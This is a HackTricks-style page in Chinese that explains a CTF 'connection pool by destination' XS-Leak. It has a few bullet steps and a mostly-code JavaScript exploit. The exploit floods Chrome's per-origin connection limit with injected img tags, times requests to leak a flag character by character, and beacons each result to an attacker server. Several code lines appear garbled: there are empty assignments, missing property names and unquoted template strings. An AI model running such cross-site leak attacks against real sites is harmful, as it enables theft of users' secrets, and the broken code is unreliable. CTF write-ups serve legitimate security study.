Connection Pool by Destination Example

从零开始学习AWS黑客技术 htARTE(HackTricks AWS红队专家)


Connection Pool by Destination Example


  • 攻击者将注入一个带有尽可能多的**<img标签加载/js/purify.js**的注释(超过6个以阻止来源)。

  • 然后,攻击者将删除索引为1的注释

  • 然后,攻击者将[使机器人访问页面以触发剩余注释]并将发送一个对**请求**,然后将计时

  • 如果时间更长,则注入在剩余注释中,如果时间更短,则标志在其中。


```html const SITE_URL = ''; const PING_URL = 'https://myserver'; function timeScript(){ return new Promise(resolve => { var x = document.createElement('script'); x.src = '' + Math.random(); var start =; x.onerror = () => { console.log(`Time: ${ - start}`); //Time request resolve( - start); x.remove(); } document.body.appendChild(x); }); } add_note = async (note) => { let x = document.createElement('form') x.action = SITE_URL + "create" x.method = "POST" = "xxx"

let i = document.createElement("input"); i.type = "text" = "text" i.value = note x.appendChild(i) document.body.appendChild(x) x.submit() }

remove_note = async (note_id) => { let x = document.createElement('form') x.action = SITE_URL+"remove" x.method = "POST" = "_blank"

let i = document.createElement("input"); i.type = "text" = "index" i.value = note_id x.appendChild(i) document.body.appendChild(x) x.submit() }

const sleep = ms => new Promise(resolve => setTimeout(resolve, ms)); // }zyxwvutsrqponmlkjihgfedcba_ const alphabet = 'zyxwvutsrqponmlkjihgfedcba_' var prefix = 'SEKAI{xsleakyay'; const TIMEOUT = 500; async function checkLetter(letter){ // Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js // Depending whether we found flag's letter it will either load the images or not. // With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char. const payload = ${prefix}${letter} + Array.from(Array(78)).map((e,i)=><img/src=/js/purify.js?${i}>).join(''); await add_note(payload); await sleep(TIMEOUT); await timeScript(); await remove_note(1); //Now, only the note with the flag or with the injection existsh await sleep(TIMEOUT); const time = await timeScript(); //Find out how much a request to the same origin takes navigator.sendBeacon(PING_URL, [letter,time]); if(time>100){ return 1; } return 0; } window.onload = async () => { navigator.sendBeacon(PING_URL, 'start'); // doesnt work because we are removing flag after success. // while(1){ for(const letter of alphabet){ if(await checkLetter(letter)){ prefix += letter; navigator.sendBeacon(PING_URL, prefix); break; } } // } };


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